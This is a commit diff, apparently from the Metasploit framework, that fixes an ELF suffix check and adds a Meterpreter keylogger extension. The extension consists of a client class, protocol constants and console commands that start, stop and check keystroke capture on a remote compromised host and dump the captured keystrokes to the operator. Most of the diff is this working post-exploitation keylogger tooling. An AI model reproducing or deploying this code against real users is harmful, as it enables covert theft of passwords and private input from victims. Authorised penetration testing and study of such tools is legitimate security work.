Fix to pass failing spec test.

lib/rex/post/meterpreter/client_core.rb

@@ -320,7 +320,9 @@ class ClientCore < Extension
 
     modnameprovided = mod
     suffix = nil
-    if not client.binary_suffix
+    # If there is no supported suffix *or* if the one supported suffix indicates
+    # ELF, then allow ELF files which have no '.elf' suffix.
+    if client.binary_suffix.blank? || (client.binary_suffix.size == 1 && client.binary_suffix.first == 'elf')
       suffix = ''
     elsif client.binary_suffix.size > 1
       client.binary_suffix.each { |s|

lib/rex/post/meterpreter/extensions/keylogger/keylogger.rb

@@ -0,0 +1,78 @@
+# -*- coding: binary -*-
+
+require 'rex/post/meterpreter/extensions/keylogger/tlv'
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Keylogger
+
+###
+#
+# This meterpreter extension can be used to capture remote keystrokes
+#
+###
+class Keylogger < Extension
+
+
+  def initialize(client)
+    super(client, 'keylogger')
+
+    client.register_extension_aliases(
+      [
+        {
+          'name' => 'keylogger',
+          'ext'  => self
+        },
+      ])
+  end
+
+  # Start keylogging
+  def capture_start()
+    request = Packet.create_request('keylogger_capture_start')
+    response = client.send_request(request)
+  end
+
+  # Stop keylogging
+  def capture_stop()
+    request = Packet.create_request('keylogger_capture_stop')
+    response = client.send_request(request)
+  end
+
+  # Retrieve status about keylogging
+  def capture_status()
+    request = Packet.create_request('keylogger_capture_status')
+    response = client.send_request(request)
+    status = response.get_tlv_value(TLV_TYPE_KEYLOGGER_STATUS)
+    return status
+  end
+
+  # Release captured keylogged data
+  def capture_release()
+    request = Packet.create_request('keylogger_capture_release')
+    response = client.send_request(request)
+  end
+
+  # Buffer the current keylogged data to a readable buffer
+  def capture_dump()
+    request = Packet.create_request('keylogger_capture_dump')
+    response = client.send_request(request, 3600)
+    records = []
+    response.each(TLV_TYPE_KEYLOGGER_CAPTURE_RECORD) { |r|
+      records << r.get_tlv_value(TLV_TYPE_KEYLOGGER_CAPTURE_RECORD_NAME)
+    }
+    return records
+  end
+
+  # Retrieve the keylogger data
+  def capture_dump_read(record)
+    request = Packet.create_request('keylogger_capture_dump_read')
+    request.add_tlv(TLV_TYPE_KEYLOGGER_CAPTURE_RECORD_NAME, record.to_s)
+    response = client.send_request(request, 3600)
+    return response.get_tlv_value(TLV_TYPE_KEYLOGGER_CAPTURE_RECORD_DATA)
+  end
+
+end
+
+end; end; end; end; end

lib/rex/post/meterpreter/extensions/keylogger/tlv.rb

@@ -0,0 +1,18 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Keylogger
+
+TLV_TYPE_EXTENSION_KEYLOGGER		= 0
+TLV_TYPE_KEYLOGGER_STATUS		= TLV_META_TYPE_BOOL   | (TLV_TYPE_EXTENSION_KEYLOGGER + TLV_EXTENSIONS + 1)
+TLV_TYPE_KEYLOGGER_CAPTURE_RECORD	= TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_KEYLOGGER + TLV_EXTENSIONS + 2)
+TLV_TYPE_KEYLOGGER_CAPTURE_RECORD_NAME	= TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_KEYLOGGER + TLV_EXTENSIONS + 3)
+TLV_TYPE_KEYLOGGER_CAPTURE_RECORD_DATA	= TLV_META_TYPE_RAW    | (TLV_TYPE_EXTENSION_KEYLOGGER + TLV_EXTENSIONS + 4)
+
+end
+end
+end
+end
+end

lib/rex/post/meterpreter/ui/console/command_dispatcher/keylogger.rb

@@ -0,0 +1,96 @@
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# Keylogger extension user interface.
+#
+###
+class Console::CommandDispatcher::Keylogger
+
+  Klass = Console::CommandDispatcher::Keylogger
+
+  include Console::CommandDispatcher
+
+  #
+  # Initializes an instance of the keylogger command interaction.
+  #
+  def initialize(shell)
+    super
+  end
+
+  #
+  # List of supported commands.
+  #
+  def commands
+    {
+      "keylogger_start" => "Start keylogging",
+      "keylogger_stop"  => "Stop keylogging",
+      "keylogger_status"  => "View keylogging status",
+      "keylogger_dump"  => "Retrieve keylogged data",
+      "keylogger_release" => "Free keylogged data instead of downloading"
+    }
+  end
+
+  def cmd_keylogger_start(*args)
+    client.keylogger.capture_start()
+    print_status("Keylogger capture started")
+
+    return true
+  end
+
+  def cmd_keylogger_stop(*args)
+    res = client.keylogger.capture_stop()
+    print_status("Keylogger capture stopped")
+
+    return true
+  end
+
+  def cmd_keylogger_status(*args)
+    status = client.keylogger.capture_status()
+    if status
+      status_str = "active"
+    else
+      status_str = "inactive"
+    end
+    print_status("Keylogger capture is currently: #{status_str}")
+
+    return true
+  end
+
+  def cmd_keylogger_release(*args)
+    res = client.keylogger.capture_release()
+
+    return true
+  end
+
+  def cmd_keylogger_dump(*args)
+    capture_records = client.keylogger.capture_dump()
+    capture_records.each { |r|
+      capture_data = client.keylogger.capture_dump_read(r)
+      if capture_data
+        print_line("========== #{r} ==========")
+        print_line("#{capture_data.to_s}")
+        print_line
+      end
+    }
+  end
+
+  #
+  # Name for this dispatcher
+  # 
+  def name
+    "Keylogger"
+  end
+
+end
+
+end
+end
+end
+end